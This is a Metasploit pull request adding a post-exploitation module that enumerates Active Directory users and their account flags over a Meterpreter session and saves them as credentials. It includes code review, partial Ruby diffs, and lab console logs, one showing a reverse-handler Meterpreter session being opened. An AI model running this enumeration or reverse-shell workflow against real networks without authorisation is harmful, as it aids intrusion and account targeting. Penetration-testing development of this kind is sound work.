### PR TITLE
Enum Ad Users -> Database

### PR DESCRIPTION
**Pull request by Meatballs1**
Dumps AD Users to the database. Tries to detect Disabled and Locked out accounts from the userAccountControl. Disabled appears to be set here, but normal account lockouts don't seem to set in the flags. 

Not sure where Metasploit::Credentials stores that info, or how it uses it, doesn't bother showing it with creds... :)

n.b. I tried using smb_login with DB_ALL_USERS true, but that didn't seem to work...

```
msf post(enum_ad_users) > show options

Module options (post/windows/gather/enum_ad_users):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   DOMAIN                       no        The domain to query or distinguished name (e.g. DC=test,DC=com)
   MAX_SEARCH  500              yes       Maximum values to retrieve, 0 for all.
   SESSION     8                yes       The session to run this module on.
   STORE_LOOT  false            yes       Store file in loot.

msf post(enum_ad_users) > rerun
[*] Reloading module...

Domain Users
============

 sAMAccountName  userAccountControl
 --------------  ------------------
 Administrator   66048
 Guest           66082
 krbtgt          514
 user01          66048
 user02          66048
 user03          66048
 user04          66048
 user05          66048
 user06          66048
 user07          66048
 user08          66048
 user09          66048
 user10          66048
 reception       512
 pwned           546
 lockout_man     512

[*] Post module execution completed
msf post(enum_ad_users) > creds
Credentials
===========

host          service        public         private  realm                 private_type
----          -------        ------         -------  -----                 ------------
172.16.80.10  445/tcp (smb)  user04                  metasploitable.local  
172.16.80.10  445/tcp (smb)  user05                  metasploitable.local  
172.16.80.10  445/tcp (smb)  user06                  metasploitable.local  
172.16.80.10  445/tcp (smb)  user07                  metasploitable.local  
172.16.80.10  445/tcp (smb)  user08                  metasploitable.local  
172.16.80.10  445/tcp (smb)  user09                  metasploitable.local  
172.16.80.10  445/tcp (smb)  user10                  metasploitable.local  
172.16.80.10  445/tcp (smb)  reception               metasploitable.local  
172.16.80.10  445/tcp (smb)  pwned                   metasploitable.local  
172.16.80.10  445/tcp (smb)  lockout_man             metasploitable.local  
172.16.80.10  445/tcp (smb)  Administrator           metasploitable.local  
172.16.80.10  445/tcp (smb)  Guest                   metasploitable.local  
172.16.80.10  445/tcp (smb)  krbtgt                  metasploitable.local  
172.16.80.10  445/tcp (smb)  user01                  metasploitable.local  
172.16.80.10  445/tcp (smb)  user02                  metasploitable.local  
172.16.80.10  445/tcp (smb)  user03                  metasploitable.local  

msf post(enum_ad_users) > 
```
## Verification
- Run on a Domain Joined PC
- Check the output of 'creds' afterwards

### CODE REVIEW

**Comment by dmaloney-r7** [comment]
@Meatballs1 lol, beating me to the punch. this has been on my lsit to do for a long time. It was marked down for after I added LDAP support to Meterpreter...which O did. Not sure If I should be happy or sad that the things I was going to do keep getting done by other people first =P

**Comment by dmaloney-r7** [comment]
i'll take a peek at this today if I can

**Comment by dmaloney-r7** [comment]
@jvazquez-r7 based on line numbers, i suspect your version of metasploit-credential may be out of date, try `bundle update metasploit-credential` and see if you still get the same error?

File: modules/post/windows/gather/enum_ad_users.rb [hunk 1]
```diff
@@ -0,0 +1,174 @@
...
+                            'CHANGE_PASSWORD',
+                            'NEVER_EXPIRES',
+                            'SMARTCARD_REQUIRED',
+                            'NEVER_LOGGEDON'
+                          ]])
+    ], self.class)
+  end
+
+  def run
+    fields = ['sAMAccountName', 'userAccountControl', 'lockoutTime', 'mail', 'primarygroupid', 'description']
```
Comment (dmaloney-r7) [inline modules/post/windows/gather/enum_ad_users.rb]: if this array of fields is never getting modified it should probably be a constant

File: modules/post/windows/gather/enum_ad_users.rb [hunk 2]
```diff
@@ -0,0 +1,174 @@
...
+    inner_filter = '(objectCategory=person)(objectClass=user)'
+    max_search = datastore['MAX_SEARCH']
+    domain = datastore['DOMAIN'] || get_domain
+    domain_ip = client.net.resolve.resolve_host(domain)[:ip]
+
+    inner_filter = "#{inner_filter}(!(lockoutTime>=1))" if datastore['EXCLUDE_LOCKED']
```
Comment (dmaloney-r7) [inline modules/post/windows/gather/enum_ad_users.rb]: why not use shovel operator here?

File: modules/post/windows/gather/enum_ad_users.rb [hunk 3]
```diff
@@ -0,0 +1,174 @@
...
+                            'NO_PASSWORD',
+                            'CHANGE_PASSWORD',
+                            'NEVER_EXPIRES',
+                            'SMARTCARD_REQUIRED',
+                            'NEVER_LOGGEDON'
+                          ]])
+    ], self.class)
+  end
+
+  def run
```
Comment (dmaloney-r7) [inline modules/post/windows/gather/enum_ad_users.rb]: this method can be broken up into smaller atomic methods, building the filter can be one method, doing the query another method, parsing the results a third. should be fairly easy to refactor this

File: modules/post/windows/gather/enum_ad_users.rb [hunk 4]
```diff
@@ -0,0 +1,174 @@
...
+      realm_value: realm,
+      realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN
+    }
+
+    credential_data.merge!(service_data)
+
+    # Create the Metasploit::Credential::Core object
+    credential_core = create_credential(credential_data)
+
+    if account_disabled?(uac.to_i)
```
Comment (dmaloney-r7) [inline modules/post/windows/gather/enum_ad_users.rb]: Excellent

**Comment by dmaloney-r7** [comment]
@jvazquez-r7 @Meatballs1 issued a PR against your PR branch with some code style cleanups per my comments above. Also pulls in latest master, including gem updates for metasploit-credential. With these changes I don't see any errors occuring.

**Comment by dmaloney-r7** [comment]
ooookay, after arguing with the github ui, i think i got the pr setup right this time...sorry about that

**Comment by Meatballs1** [comment]
All changes working here, thanks @dmaloney-r7

**Comment by jvazquez-r7** [comment]
And the duplicate error was due to my database being in kinda weird state, so I guess it is ready to go, fast check and landing, thanks @dmaloney-r7 and @Meatballs1 !

**Comment by jvazquez-r7** [comment]
well, holding, @dmaloney-r7 already assigned himself, maybe wants to double check, giving him chance to review, otherwise will land along the next days :)

**Comment by jvazquez-r7** [comment]
ack'ed with @dmaloney-r7, I'm going to do last check and landing ! Thanks @Meatballs1 and @dmaloney-r7 for the hard work here!

**Comment by jvazquez-r7** [comment]
Last test;

```
msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 172.16.158.134
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.134:53524) at 2015-01-30 17:17:56 -0600

meterpreter > getuid
Server username: DEMO\Administrator
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/gather/enum_ad_users
msf post(enum_ad_users) > set session 1
session => 1
msf post(enum_ad_users) > run

Domain Users
============

 sAMAccountName  userAccountControl  lockoutTime  mail  primarygroupid  description
 --------------  ------------------  -----------  ----  --------------  -----------
 Administrator   512                                    513             Built-in account for administering the computer/domain
 Guest           66082                                  514             Built-in account for guest access to the computer/domain
 juan            512                                    513
 krbtgt          514                                    513             Key Distribution Center Service Account

```

**Comment by Meatballs1** [comment]
Cool ta :)

**Pull request merged**